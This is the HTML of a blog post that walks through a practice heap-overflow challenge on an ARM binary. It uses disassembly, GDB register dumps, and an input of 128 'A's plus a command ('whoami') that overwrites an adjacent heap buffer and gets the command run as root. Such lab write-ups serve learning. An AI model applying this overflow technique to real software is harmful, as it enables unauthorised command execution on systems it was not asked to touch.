<!DOCTYPE html>
<html lang="en">

  <head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">

  <!-- Begin Jekyll SEO tag v2.5.0 -->
<title>Basic Heap Overflow | Crawl3r</title>
<meta name="generator" content="Jekyll v3.7.4" />
<meta property="og:title" content="Basic Heap Overflow" />
<meta name="author" content="Crawl3r" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Intro I finally had some time to get back to Billy’s ARM exploitation challenges found on his github. Until now, I have only really focused on the stack based vulnerabilities so I wanted to try some of his Heap based challenges. This post covers my approach to completing his ‘Heap Level 1’ challenge. The Challenge: The first Heap challenge that he released contained a very simple heap overflow vulnerability that allows the execution of a custom system command. The following output is produced from executing the binary: Garys-iPhone:/lab/rop root# ./heaplevel1 Usage: ./heaplevel1 &lt;username&gt; From above, we can see that the binary takes a single argument; the username. Executing the binary with a specified username executes additional code and produces different output: Garys-iPhone:/lab/rop root# ./heaplevel1 test Welcome to heaplevel1, created by @bellis1000 User: test is executing command &quot;date&quot; Sun Feb 24 01:48:27 GMT 2019 Inspecting the Binary To see what’s going on inside the binary, we can make use of a disassembler, for this step I used Hopper, but other tools will help accomplish the same. Looking at the following code, we can see there are two malloc functions. As this binary was compiled for the ARM architecture, we can picture the malloc() functions and the values used within their parameters. void *malloc(size_t size) In ARM, the R1 register is used to hold the value of the first parameter of a function, so from the following code we can see that the value ‘0x80’ is moved into R1 before the malloc() function is called. 0000be4c movw r1, #0x80 0000be50 str r0, [sp, #0x30 + var_1C] 0000be54 mov r0, r1 0000be58 bl imp___symbolstub1__malloc 0000be5c movw r1, #0x80 0000be60 str r0, [r7, #-0x10] 0000be64 mov r0, r1 0000be68 bl imp___symbolstub1__malloc 0x80 in decimal is 128, so we know that both malloc calls pass the decimal value of 128 in as a parameter and allocate 128 bytes of heap memory. malloc(128); Based on the two call’s occuring one after the other, both allocations will likely be next to each other within memory however we can dig deeper into this at runtime using GDB. Before we do this, there are a few more things we can do to help make our debugging a little smoother. The following list holds some points that we need to keep in mind whilst stepping through each instruction: 1st malloc() -&gt; 0xbe58 2nd malloc() -&gt; 0xbe68 1st strcpy() -&gt; 0xbe80, loads ‘date’ system call into the 1st heap buffer 2nd strcpy() -&gt; 0xbea0, loads the username into the 2nd heap buffer printf() -&gt; 0xbec4, prints the username and target system call to use Runtime analysis: Breakpoint 0xbec4 Run to it, dump registers. See that r1 is the init’d string, r2 is the username and r3 is the system call. (gdb) c Continuing. Welcome to heaplevel1, created by @bellis1000 Breakpoint 2, 0x0000bec4 in main () (gdb) i r r0 0xbfbd 49085 r1 0x14b010 1355792 r2 0x14b090 1355920 r3 0x14b090 1355920 r4 0x0 0 r5 0x0 0 r6 0x0 0 r7 0x27dff758 668989272 r8 0x27dff75c 668989276 r9 0x3a80ce30 981519920 r10 0x0 0 r11 0x0 0 r12 0x14b091 1355921 sp 0x27dff728 668989224 lr 0x38a63ddf 950418911 pc 0xbec4 48836 View the addresses the r1, r2 and r3 to picture the printed output. (gdb) x/w 0xbfbd 0xbfbd: &quot;\033[36mUser: %s is executing command \&quot;%s\&quot;\n&quot; (gdb) x/w 0x14b010 0x14b010: &#39;A&#39; &lt;repeats 128 times&gt; (gdb) x/2w 0x14b010 0x14b010: &#39;A&#39; &lt;repeats 128 times&gt; 0x14b091: &quot;ate&quot; Run it again with 128 A’s and 4 B’s. Welcome to heaplevel1, created by @bellis1000 User: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB is executing command &quot;BBBB&quot; sh: BBBB: command not found We now know that the BBBB overwrites the value stored in the address that is used during the execution of the system command. Minus the r2 addr from r3 addr == 128 bytes, proof that the heap allocs are next to each other. 128 A’s with ‘whoami’ == overflow into code exec Breakpoint 2, 0x0000bec4 in main () (gdb) i r r0 0xbfbd 49085 r1 0x155c20 1399840 r2 0x155ca0 1399968 r3 0x155ca0 1399968 (gdb) x/10w 0x155c20 0x155c20: &#39;A&#39; &lt;repeats 128 times&gt;, &quot;whoami&quot; (gdb) c Continuing. User: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwhoami is executing command &quot;whoami&quot; root Conclusion and my thoughts: I would be interested to hear feedback about this technique and whether or not there are further ways to increase the reliability of the results as well as maintaining the speed. Let me know your thoughts on twitter. Thanks for reading." />
<meta property="og:description" content="Intro I finally had some time to get back to Billy’s ARM exploitation challenges found on his github. Until now, I have only really focused on the stack based vulnerabilities so I wanted to try some of his Heap based challenges. This post covers my approach to completing his ‘Heap Level 1’ challenge. The Challenge: The first Heap challenge that he released contained a very simple heap overflow vulnerability that allows the execution of a custom system command. The following output is produced from executing the binary: Garys-iPhone:/lab/rop root# ./heaplevel1 Usage: ./heaplevel1 &lt;username&gt; From above, we can see that the binary takes a single argument; the username. Executing the binary with a specified username executes additional code and produces different output: Garys-iPhone:/lab/rop root# ./heaplevel1 test Welcome to heaplevel1, created by @bellis1000 User: test is executing command &quot;date&quot; Sun Feb 24 01:48:27 GMT 2019 Inspecting the Binary To see what’s going on inside the binary, we can make use of a disassembler, for this step I used Hopper, but other tools will help accomplish the same. Looking at the following code, we can see there are two malloc functions. As this binary was compiled for the ARM architecture, we can picture the malloc() functions and the values used within their parameters. void *malloc(size_t size) In ARM, the R1 register is used to hold the value of the first parameter of a function, so from the following code we can see that the value ‘0x80’ is moved into R1 before the malloc() function is called. 0000be4c movw r1, #0x80 0000be50 str r0, [sp, #0x30 + var_1C] 0000be54 mov r0, r1 0000be58 bl imp___symbolstub1__malloc 0000be5c movw r1, #0x80 0000be60 str r0, [r7, #-0x10] 0000be64 mov r0, r1 0000be68 bl imp___symbolstub1__malloc 0x80 in decimal is 128, so we know that both malloc calls pass the decimal value of 128 in as a parameter and allocate 128 bytes of heap memory. malloc(128); Based on the two call’s occuring one after the other, both allocations will likely be next to each other within memory however we can dig deeper into this at runtime using GDB. Before we do this, there are a few more things we can do to help make our debugging a little smoother. The following list holds some points that we need to keep in mind whilst stepping through each instruction: 1st malloc() -&gt; 0xbe58 2nd malloc() -&gt; 0xbe68 1st strcpy() -&gt; 0xbe80, loads ‘date’ system call into the 1st heap buffer 2nd strcpy() -&gt; 0xbea0, loads the username into the 2nd heap buffer printf() -&gt; 0xbec4, prints the username and target system call to use Runtime analysis: Breakpoint 0xbec4 Run to it, dump registers. See that r1 is the init’d string, r2 is the username and r3 is the system call. (gdb) c Continuing. Welcome to heaplevel1, created by @bellis1000 Breakpoint 2, 0x0000bec4 in main () (gdb) i r r0 0xbfbd 49085 r1 0x14b010 1355792 r2 0x14b090 1355920 r3 0x14b090 1355920 r4 0x0 0 r5 0x0 0 r6 0x0 0 r7 0x27dff758 668989272 r8 0x27dff75c 668989276 r9 0x3a80ce30 981519920 r10 0x0 0 r11 0x0 0 r12 0x14b091 1355921 sp 0x27dff728 668989224 lr 0x38a63ddf 950418911 pc 0xbec4 48836 View the addresses the r1, r2 and r3 to picture the printed output. (gdb) x/w 0xbfbd 0xbfbd: &quot;\033[36mUser: %s is executing command \&quot;%s\&quot;\n&quot; (gdb) x/w 0x14b010 0x14b010: &#39;A&#39; &lt;repeats 128 times&gt; (gdb) x/2w 0x14b010 0x14b010: &#39;A&#39; &lt;repeats 128 times&gt; 0x14b091: &quot;ate&quot; Run it again with 128 A’s and 4 B’s. Welcome to heaplevel1, created by @bellis1000 User: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB is executing command &quot;BBBB&quot; sh: BBBB: command not found We now know that the BBBB overwrites the value stored in the address that is used during the execution of the system command. Minus the r2 addr from r3 addr == 128 bytes, proof that the heap allocs are next to each other. 128 A’s with ‘whoami’ == overflow into code exec Breakpoint 2, 0x0000bec4 in main () (gdb) i r r0 0xbfbd 49085 r1 0x155c20 1399840 r2 0x155ca0 1399968 r3 0x155ca0 1399968 (gdb) x/10w 0x155c20 0x155c20: &#39;A&#39; &lt;repeats 128 times&gt;, &quot;whoami&quot; (gdb) c Continuing. User: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwhoami is executing command &quot;whoami&quot; root Conclusion and my thoughts: I would be interested to hear feedback about this technique and whether or not there are further ways to increase the reliability of the results as well as maintaining the speed. Let me know your thoughts on twitter. Thanks for reading." />
<link rel="canonical" href="http://localhost:4000/2019-02-24/basic_heap_overflow" />
<meta property="og:url" content="http://localhost:4000/2019-02-24/basic_heap_overflow" />
<meta property="og:site_name" content="Crawl3r" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2019-02-24T00:00:00+00:00" />
<script type="application/ld+json">
{"description":"Intro I finally had some time to get back to Billy’s ARM exploitation challenges found on his github. Until now, I have only really focused on the stack based vulnerabilities so I wanted to try some of his Heap based challenges. This post covers my approach to completing his ‘Heap Level 1’ challenge. The Challenge: The first Heap challenge that he released contained a very simple heap overflow vulnerability that allows the execution of a custom system command. The following output is produced from executing the binary: Garys-iPhone:/lab/rop root# ./heaplevel1 Usage: ./heaplevel1 &lt;username&gt; From above, we can see that the binary takes a single argument; the username. Executing the binary with a specified username executes additional code and produces different output: Garys-iPhone:/lab/rop root# ./heaplevel1 test Welcome to heaplevel1, created by @bellis1000 User: test is executing command &quot;date&quot; Sun Feb 24 01:48:27 GMT 2019 Inspecting the Binary To see what’s going on inside the binary, we can make use of a disassembler, for this step I used Hopper, but other tools will help accomplish the same. Looking at the following code, we can see there are two malloc functions. As this binary was compiled for the ARM architecture, we can picture the malloc() functions and the values used within their parameters. void *malloc(size_t size) In ARM, the R1 register is used to hold the value of the first parameter of a function, so from the following code we can see that the value ‘0x80’ is moved into R1 before the malloc() function is called. 0000be4c movw r1, #0x80 0000be50 str r0, [sp, #0x30 + var_1C] 0000be54 mov r0, r1 0000be58 bl imp___symbolstub1__malloc 0000be5c movw r1, #0x80 0000be60 str r0, [r7, #-0x10] 0000be64 mov r0, r1 0000be68 bl imp___symbolstub1__malloc 0x80 in decimal is 128, so we know that both malloc calls pass the decimal value of 128 in as a parameter and allocate 128 bytes of heap memory. malloc(128); Based on the two call’s occuring one after the other, both allocations will likely be next to each other within memory however we can dig deeper into this at runtime using GDB. Before we do this, there are a few more things we can do to help make our debugging a little smoother. The following list holds some points that we need to keep in mind whilst stepping through each instruction: 1st malloc() -&gt; 0xbe58 2nd malloc() -&gt; 0xbe68 1st strcpy() -&gt; 0xbe80, loads ‘date’ system call into the 1st heap buffer 2nd strcpy() -&gt; 0xbea0, loads the username into the 2nd heap buffer printf() -&gt; 0xbec4, prints the username and target system call to use Runtime analysis: Breakpoint 0xbec4 Run to it, dump registers. See that r1 is the init’d string, r2 is the username and r3 is the system call. (gdb) c Continuing. Welcome to heaplevel1, created by @bellis1000 Breakpoint 2, 0x0000bec4 in main () (gdb) i r r0 0xbfbd 49085 r1 0x14b010 1355792 r2 0x14b090 1355920 r3 0x14b090 1355920 r4 0x0 0 r5 0x0 0 r6 0x0 0 r7 0x27dff758 668989272 r8 0x27dff75c 668989276 r9 0x3a80ce30 981519920 r10 0x0 0 r11 0x0 0 r12 0x14b091 1355921 sp 0x27dff728 668989224 lr 0x38a63ddf 950418911 pc 0xbec4 48836 View the addresses the r1, r2 and r3 to picture the printed output. (gdb) x/w 0xbfbd 0xbfbd: &quot;\\033[36mUser: %s is executing command \\&quot;%s\\&quot;\\n&quot; (gdb) x/w 0x14b010 0x14b010: &#39;A&#39; &lt;repeats 128 times&gt; (gdb) x/2w 0x14b010 0x14b010: &#39;A&#39; &lt;repeats 128 times&gt; 0x14b091: &quot;ate&quot; Run it again with 128 A’s and 4 B’s. Welcome to heaplevel1, created by @bellis1000 User: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB is executing command &quot;BBBB&quot; sh: BBBB: command not found We now know that the BBBB overwrites the value stored in the address that is used during the execution of the system command. Minus the r2 addr from r3 addr == 128 bytes, proof that the heap allocs are next to each other. 128 A’s with ‘whoami’ == overflow into code exec Breakpoint 2, 0x0000bec4 in main () (gdb) i r r0 0xbfbd 49085 r1 0x155c20 1399840 r2 0x155ca0 1399968 r3 0x155ca0 1399968 (gdb) x/10w 0x155c20 0x155c20: &#39;A&#39; &lt;repeats 128 times&gt;, &quot;whoami&quot; (gdb) c Continuing. User: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwhoami is executing command &quot;whoami&quot; root Conclusion and my thoughts: I would be interested to hear feedback about this technique and whether or not there are further ways to increase the reliability of the results as well as maintaining the speed. Let me know your thoughts on twitter. Thanks for reading.","author":{"@type":"Person","name":"Crawl3r"},"@type":"BlogPosting","url":"http://localhost:4000/2019-02-24/basic_heap_overflow","headline":"Basic Heap Overflow","dateModified":"2019-02-24T00:00:00+00:00","datePublished":"2019-02-24T00:00:00+00:00","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/2019-02-24/basic_heap_overflow"},"@context":"http://schema.org"}</script>
<!-- End Jekyll SEO tag -->


  <!-- CSS -->
  <link rel="stylesheet" href="/assets/main.css">
  <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Libre+Baskerville:400,400i,700">

  <!-- Favicon -->
  <link rel="icon" type="image/png" sizes="32x32" href="/assets/favicon-32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/assets/favicon-16x16.png">
  <link rel="apple-touch-icon" sizes="180x180" href="/assets/apple-touch-icon.png">

  <!-- RSS -->
  <link type="application/atom+xml" rel="alternate" href="http://localhost:4000/feed.xml" title="Crawl3r" />

</head>


  <body>

    <nav class="nav">
  <div class="nav-container">
    <a href="/">
      <h2 class="nav-title">Crawl3r</h2>
    </a>
    
    <ul>
      <li><a href="/about">About</a></li>
      <li><a href="/">Posts</a></li>
    </ul>
  </div>
</nav>


    <main>
      <div class="post">
  <div class="post-info">
    <span>Written by</span>
    
        Crawl3r
    

    
      <br>
      <span>on&nbsp;</span><time datetime="2019-02-24 00:00:00 +0000">February 24, 2019</time>
    
  </div>

  <h1 class="post-title">Basic Heap Overflow</h1>
  <div class="post-line"></div>

  <h2 id="intro">Intro</h2>
<p>I finally had some time to get back to Billy’s ARM exploitation challenges found on his <a href="https://github.com/Billy-Ellis/Exploit-Challenges">github</a>. Until now, I have only really focused on the stack based vulnerabilities so I wanted to try some of his Heap based challenges. This post covers my approach to completing his ‘Heap Level 1’ challenge.</p>

<h2 id="the-challenge">The Challenge:</h2>
<p>The first Heap challenge that he released contained a very simple heap overflow vulnerability that allows the execution of a custom system command. The following output is produced from executing the binary:</p>

<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Garys-iPhone:/lab/rop root# ./heaplevel1 
Usage: ./heaplevel1 &lt;username&gt;
</code></pre></div></div>

<p>From above, we can see that the binary takes a single argument; the username. Executing the binary with a specified username executes additional code and produces different output:</p>

<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Garys-iPhone:/lab/rop root# ./heaplevel1 test
Welcome to heaplevel1, created by @bellis1000
User: test is executing command "date"
Sun Feb 24 01:48:27 GMT 2019
</code></pre></div></div>

<h2 id="inspecting-the-binary">Inspecting the Binary</h2>
<p>To see what’s going on inside the binary, we can make use of a disassembler, for this step I used Hopper, but other tools will help accomplish the same.</p>

<p>Looking at the following code, we can see there are two malloc functions. As this binary was compiled for the ARM architecture, we can picture the malloc() functions and the values used within their parameters.</p>

<p><code class="highlighter-rouge">void *malloc(size_t size)</code></p>

<p>In ARM, the R1 register is used to hold the value of the first parameter of a function, so from the following code we can see that the value ‘0x80’ is moved into R1 before the malloc() function is called.</p>

<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0000be4c         movw       r1, #0x80
0000be50         str        r0, [sp, #0x30 + var_1C]
0000be54         mov        r0, r1
0000be58         bl         imp___symbolstub1__malloc
0000be5c         movw       r1, #0x80
0000be60         str        r0, [r7, #-0x10]
0000be64         mov        r0, r1
0000be68         bl         imp___symbolstub1__malloc
</code></pre></div></div>

<p>0x80 in decimal is 128, so we know that both malloc calls pass the decimal value of 128 in as a parameter and allocate 128 bytes of heap memory.</p>

<p><code class="highlighter-rouge">malloc(128);</code></p>

<p>Based on the two call’s occuring one after the other, both allocations will likely be next to each other within memory however we can dig deeper into this at runtime using GDB. Before we do this, there are a few more things we can do to help make our debugging a little smoother. The following list holds some points that we need to keep in mind whilst stepping through each instruction:</p>

<ul>
  <li>1st malloc() -&gt; 0xbe58</li>
  <li>2nd malloc() -&gt; 0xbe68</li>
  <li>1st strcpy() -&gt; 0xbe80, loads ‘date’ system call into the 1st heap buffer</li>
  <li>2nd strcpy() -&gt; 0xbea0, loads the username into the 2nd heap buffer</li>
  <li>printf() -&gt; 0xbec4, prints the username and target system call to use</li>
</ul>

<h2 id="runtime-analysis">Runtime analysis:</h2>
<p>Breakpoint 0xbec4
Run to it, dump registers. See that r1 is the init’d string, r2 is the username and r3 is the system call.</p>

<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(gdb) c
Continuing.
Welcome to heaplevel1, created by @bellis1000

Breakpoint 2, 0x0000bec4 in main ()
(gdb) i r
r0             0xbfbd	49085
r1             0x14b010	1355792
r2             0x14b090	1355920
r3             0x14b090	1355920
r4             0x0	0
r5             0x0	0
r6             0x0	0
r7             0x27dff758	668989272
r8             0x27dff75c	668989276
r9             0x3a80ce30	981519920
r10            0x0	0
r11            0x0	0
r12            0x14b091	1355921
sp             0x27dff728	668989224
lr             0x38a63ddf	950418911
pc             0xbec4	48836
</code></pre></div></div>

<p>View the addresses the r1, r2 and r3 to picture the printed output.</p>

<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(gdb) x/w 0xbfbd
0xbfbd:  "\033[36mUser: %s is executing command \"%s\"\n"
(gdb) x/w 0x14b010
0x14b010:  'A' &lt;repeats 128 times&gt;
(gdb) x/2w 0x14b010
0x14b010:  'A' &lt;repeats 128 times&gt;
0x14b091:  "ate"
</code></pre></div></div>

<p>Run it again with 128 A’s and 4 B’s.</p>

<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Welcome to heaplevel1, created by @bellis1000
User: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB is executing command "BBBB"
sh: BBBB: command not found
</code></pre></div></div>

<p>We now know that the BBBB overwrites the value stored in the address that is used during the execution of the system command.
Minus the r2 addr from r3 addr == 128 bytes, proof that the heap allocs are next to each other.</p>

<p>128 A’s with ‘whoami’ == overflow into code exec</p>

<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Breakpoint 2, 0x0000bec4 in main ()
(gdb) i r
r0             0xbfbd	49085
r1             0x155c20	1399840
r2             0x155ca0	1399968
r3             0x155ca0	1399968
</code></pre></div></div>

<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(gdb) x/10w 0x155c20
0x155c20:  'A' &lt;repeats 128 times&gt;, "whoami"
</code></pre></div></div>

<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(gdb) c
Continuing.
User: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwhoami is executing command "whoami"
root
</code></pre></div></div>

<h2 id="conclusion-and-my-thoughts">Conclusion and my thoughts:</h2>

<p>I would be interested to hear feedback about this technique and whether or not there are further ways to increase the reliability of the results as well as maintaining the speed. Let me know your thoughts on twitter.</p>

<p>Thanks for reading.</p>


</div>

<div class="pagination">
  
    <a href="/2019-03-03/before_during_after_oscp" class="left arrow">&#8592;</a>
  
  
    <a href="/2018-11-11/first_wild_xxe" class="right arrow">&#8594;</a>
  

  <a href="#" class="top">Top</a>
</div>
    </main>

    <footer>
  <span>
    &copy; <time datetime="2020-01-07 21:39:26 +0000">2020</time> Crawl3r. Made with Jekyll using the <a href="https://github.com/chesterhow/tale/">Tale</a> theme.
  </span>
</footer>

  </body>
</html>
